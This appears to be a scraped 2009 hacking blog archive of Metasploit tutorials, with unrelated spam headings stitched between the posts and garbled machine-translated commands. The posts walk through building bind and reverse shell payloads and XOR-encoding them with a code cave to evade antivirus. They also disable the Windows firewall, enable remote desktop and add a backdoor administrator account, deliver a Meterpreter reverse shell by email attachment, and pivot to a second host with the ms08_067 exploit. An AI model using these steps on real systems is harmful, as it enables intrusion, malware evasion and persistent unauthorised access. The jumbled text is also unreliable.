May 2009

Saturday, May 23, 2009

Wording For Back Of Wedding Program

Metasploit daemon - msfd II

This plugin provides an msf daemon interface that spawns a listener on a
defined port (default 55554) and gives each connecting client its own
console interface. These consoles all share the same framework instance.

link:
http://trac.metasploit.com/browser/framework3/trunk/plugins/msfd.rb

Wording For Back Of Wedding Program

Metasploit daemon - msfd II

Friday, May 22, 2009

Vaio Doesn't Detect Webcam

Metasploit daemon - msfd I

Utility that opens the Metasploit framework for remote access. Basically turns the framework on the local machine into a server for remote machines.

Location:
/pentest/exploit/framework3

Usage:
. / MSFD -a-d-p

Example:
. / MSFD-a-d 192.168.1.100-p 4444
[*] Initializing MSFD ...
[*] Running MSFD ...

links:
https: / / wiki.remote-exploit.org/backtrack/wiki/msfd
http://trac.metasploit.com/browser/framework3/trunk/msfd

Vaio Doesn't Detect Webcam

Metasploit daemon - msfd I

Thursday, May 21, 2009

Can A Cell Phone Headset Match With Ps3

Metasploit keylogging

Can A Cell Phone Headset Match With Ps3

Metasploit keylogging

Saturday, May 16, 2009

Hamster Bleeding From

Msfencode + Xor encoding ==> 15%

File encodedbindtcpx.exe received 2009.05.16 11:23:28 p.m. (CET) Current status: finished Result
: 6 / 40 (15.00%)

http://www.virustotal.com/fr/analisis/ 2dcd8d8636d7aae5dd1ae629abcca482

Hamster Bleeding From

Friday, May 15, 2009

Fixing Lcd Tv Bleeding

msfencode vs XOR encryption

. / Msfpayload windows / shell_bind_tcp LPORT X = 55555> ***. exe file

bindtcpx.exe received 2009.05.15 8:33:46 p.m. (PST)
Current status: finished Result
: 12 / 40 (30.00%)
http://www.virustotal.com/fr/analisis/86902b47b990be990c8dbccfd2628e49

------------------------ - Execution flow
hijack ==> XOR encryption

File bindtcpx1.exe received 2009.05.15 8:35:25 p.m. (PST)
Current Status: finished
Result: 8 / 40 (20.00%)
http : / / www.virustotal.com/fr/analisis/768667c427ae3001c11dff126c54f231

--------------------------
. / Msfpayload windows / shell_bind_tcp LPORT msfencode R = 55,555-b''-t-o exe ***. exe file

encodedbindtcp.exe received 2009.05.16 11:33:49 p.m. (CET) Current status: finished
Result: 10/40 (25.00%)
http://www.virustotal .com/fr/analisis/4a7e5c372c5292c0a56799ad75b10b3e

Fixing Lcd Tv Bleeding

What To Do When You Have To Run With Your Period

Execution flow hijack + XOR encryption

*** Based On The demo made by shmoocon Muts ***

Backtrack:
msfpayload windows / shell_bind_tcp LPORT = 55555 X> bindtcp.exe

Windows:
Click on the file ==> bound hell on port 55 555
check: netstat-na find "55 555"

PEditor
. Idata: vsize: 500 - rsize: 400

hexedit:
+ 200 hex bytes

--------------
- OllyDbg -
--------------
first instructions:
00401000> 31C0 XOR EAX, EAX

00,401,002 68 34.104 million PUSH
00,401,007th 64: FF30 PUSH DWORD PTR FS: [EAX]
0040100A. 64:8920 MOV DWORD PTR FS: [EAX], ESP 0040100D
. 6A 40 PUSH 40

Code cave: 00,401,066
start: 00,401,002
end: 00401060

XOR loop:
MOV EAX, 00401002 # Start of encoding address.
XOR BYTE PTR DS: [EAX], 5E # XOR the contents of EAX with the key 5E
INC EAX # Increase EAX
CMP EAX, 00401060 # Tests to see if we've reached the end of our enc
JLE SHORT xxx # If not, jump back to XOR command

After the loop:
XOR EAX,EAX (overwritten instructions)
JMP 00401002 (the address after the overwritten instructions)

------------------
Commentaires
------------------

1- Créer un payload bind_tcp
msfpayload windows/shell_bind_tcp LPORT=55555 X> bindtcp.exe (for example)

2 - The scanner via VirusTotal (résultat. ..)
3 - Click on the payload and verify that the port is an open
netstat-na find "55555"

4 - Run the payload in PEditor
-Modify the section. idata
vsize: 500 & rsize: 400
It must be readable, writable and executable.
-Modify the section. Text (readable, Writable and executable)
Save

5 - Open the payload with Hexedit
Add 200-byte hex
Since (initial-rsize = 200, actual-rsize = 400) 400 - 200 ==> 200. Save

6 - Starting the payload via Ollydbg
1ST-Copy instructions in notepad (to locate the instructions that will be replaced)
-Find Space for a "code cave"-
returned on the OEP (entrypoint / early ), replace the first instruction with "JMP address-of-code-cave"
-Définir/repérer the address at which to start encoding
-Définir/repérer the address to which the encoding must end, and modify the loop ASM with these addresses.
-After the loop, insert the instruction (instructions) which was replaced by JMP from the beginning.
And second end with a JMP to the address [00401002] qui suit l'instruction remplacée

What To Do When You Have To Run With Your Period

Execution flow hijack + XOR encryption

Sunday, May 3, 2009

Red Mucus Discharge On Period

Meterpreter Autoscript scraper.rb

scraper.rb on metasploit [dot] com

http://trac.metasploit.com/wiki/AutomatingMeterpreter

Red Mucus Discharge On Period

Meterpreter Autoscript scraper.rb

scraper.rb on metasploit [dot] com

http://trac.metasploit.com/wiki/AutomatingMeterpreter

What Type Of Corn To Burn In Pellet Stove

Remote desktop configuration

Getgui script:

getgui.rb on metasploit
run getgui -h

manual config:

Netstat –na find “3389”
Netsh firewall show opmode
netsh firewall set opmode mode=DISABLE
netsh firewall set opmode exception=ENABLE
netsh firewall set service type = remotedesktop mode = enable
netsh firewall set service type = remotedesktop mode = enable scope=CUSTOM 192.168.1.64

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" find "fDenyTSConnections"

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

net user morpheus thematrix /add
net localgroup "Utilisateurs de Bureau à distance" /add"
net localgroup Administrateurs morpheus /add

What Type Of Corn To Burn In Pellet Stove

Remote desktop configuration

Getgui script:

getgui.rb on metasploit
run getgui -h

manual config:

Saturday, May 2, 2009

How Much Jon Cryer Getpaods

Meterpreter attack pivot [video]

----------------------------------------------
network 1 (wifi)
R1: xx.xx.xx.xx (public IP)
NAT overload + Static PAT (53, 69, 4444, 4445)
A: 192.168.1.8 Laptop BT (attack)
-------------------------- --------------------

R2 network 2: NAT overload (firewall)
B: Desktop XPSP2 192.168.1.67 (target1 - pivot)
C: Laptop XPSP3 192,168 .1.66 (target2)
-------------------------------------------- - A
== == wifi> * Internet * --- R1 -> R2 * * == == wire> B + + == wire ==> C
-------- -------------------------------------- -----------
-----------------------------------
ATTACK 1 (B)
Email this (eg ) of a suspicious file (. macrovba-doc,. pdf,. jpg, etc. ....) which executes a payload tcp reverse.

msfpayload windows / Meterpreter / reverse_tcp LHOST = xx.xx.xx.xx LPORT = 4444 X> # reverse.exe
for the demonstration, we transferred the file via tftp
msfconsole
use multi / handler
set payload windows / Meterpreter / reverse_tcp
set LHOST 192.168.1.8
set LPORT 4444
feat
executes reverse.exe # B ==> 1st Session Meterpreter

------------------ ----------------------------
CONFIGURATION PIVOT on B

portfwd add-L 127.0.0.1-l 4445-r 192168 .1.66-p 445
background
route add 192.168.1.66 1 255 255 255 255
# 1 being the number of session

----------------------------------------- -----
ATTACK 2 (C)

use windows/smb/ms08_067_netapi
set RHOST 192.168.1.66
set RPORT 445
set payload windows / Meterpreter / bind_tcp
set LPORT 4445
feat
# 2nd session Meterpreter